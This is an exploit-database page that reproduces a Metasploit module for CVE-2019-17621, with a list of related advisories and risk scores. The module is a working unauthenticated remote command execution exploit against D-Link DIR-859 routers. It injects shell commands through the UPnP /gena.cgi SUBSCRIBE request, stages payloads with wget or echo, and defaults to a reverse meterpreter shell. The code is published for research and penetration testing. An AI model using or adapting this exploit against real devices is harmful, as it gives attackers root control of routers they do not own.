D-Link DIR-859 Unauthenticated Remote Command Execution Exploit

🗓️ 23 Jan 2020 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 105 Views

D-Link DIR-859 Unauthenticated Remote Command Executio

Reporter	Title	Published	Views	Family All 27
Gitee	Exploit for Deserialization of Untrusted Data in Redhat Jboss_Enterprise_Application_Platform	8 Dec 202020:38	–	gitee
Gitee	Exploit for OS Command Injection in Dlink Dir-859_Firmware	14 Nov 202221:16	–	gitee
Gitee	Exploit for OS Command Injection in Dlink Dir-859_Firmware	27 Sep 202114:59	–	gitee
GithubExploit	Exploit for OS Command Injection in Dlink Dir-859_Firmware	20 Jul 202209:39	–	githubexploit
ATTACKERKB	CVE-2019-17621	28 Mar 201900:00	–	attackerkb
BDU FSTEC	The vulnerability of D-Link DIR-818Lx, DIR-822, DIR-823, DIR-859, DIR-865L, DIR-868L, DIR-869, DIR-880L, DIR-890L/R, DIR-885L/R, and DIR-895L/R routers stems from the failure to address the issue of eliminating special elements used in the operating system’s command set. This allows attackers to execute arbitrary commands on behalf of the root user in the target system.	11 Feb 202000:00	–	bdu_fstec
Circl	CVE-2019-17621	21 Jan 202013:41	–	circl
CISA KEV Catalog	D-Link DIR-859 Router Command Execution Vulnerability	29 Jun 202300:00	–	cisa_kev
CISA	CISA Adds Eight Known Exploited Vulnerabilities to Catalog	29 Jun 202312:00	–	cisa
CNVD	Command Execution Vulnerability in DLINKDIR-859 Series Routers	31 Dec 201900:00	–	cnvd

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR-859 Unauthenticated Remote Command Execution',
      'Description' => %q{
        D-Link DIR-859 Routers are vulnerable to OS command injection via the UPnP
        interface. The vulnerability exists in /gena.cgi (function genacgi_main() in
        /htdocs/cgibin), which is accessible without credentials.
      },
      'Author'      =>
        [
          'Miguel Mendez Z., @s1kr10s', # Vulnerability discovery and initial exploit
          'Pablo Pollanco P.' # Vulnerability discovery and metasploit module
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          [ 'CVE', '2019-17621' ],
          [ 'URL', 'https://medium.com/@s1kr10s/d94b47a15104' ]
        ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'        => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
            'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
            'CMDSTAGER::FLAVOR' => 'wget',
            'RPORT' => '49152'
        },
      'Targets'        =>
        [
          [ 'Automatic',  { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget'  => 0,
      ))

  end

  def execute_command(cmd, opts)
    callback_uri = "http://192.168.0." + Rex::Text.rand_text_hex(2).to_i(16).to_s +
      ":" + Rex::Text.rand_text_hex(4).to_i(16).to_s +
      "/" + Rex::Text.rand_text_alpha(3..12)
    begin
      send_request_raw({
        'uri'  => "/gena.cgi?service=`#{cmd}`",
        'method' =>  'SUBSCRIBE',
        'headers' =>
        {
                'Callback' => "<#{callback_uri}>",
                'NT' => 'upnp:event',
                'Timeout' => 'Second-1800',
        },
      })
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end

  def exploit
    execute_cmdstager(linemax: 500)
  end
end

23 Jan 2020 00:00Current

1Low risk

Vulners AI Score1

CVSS 3.19.8

CVSS 210

EPSS0.93009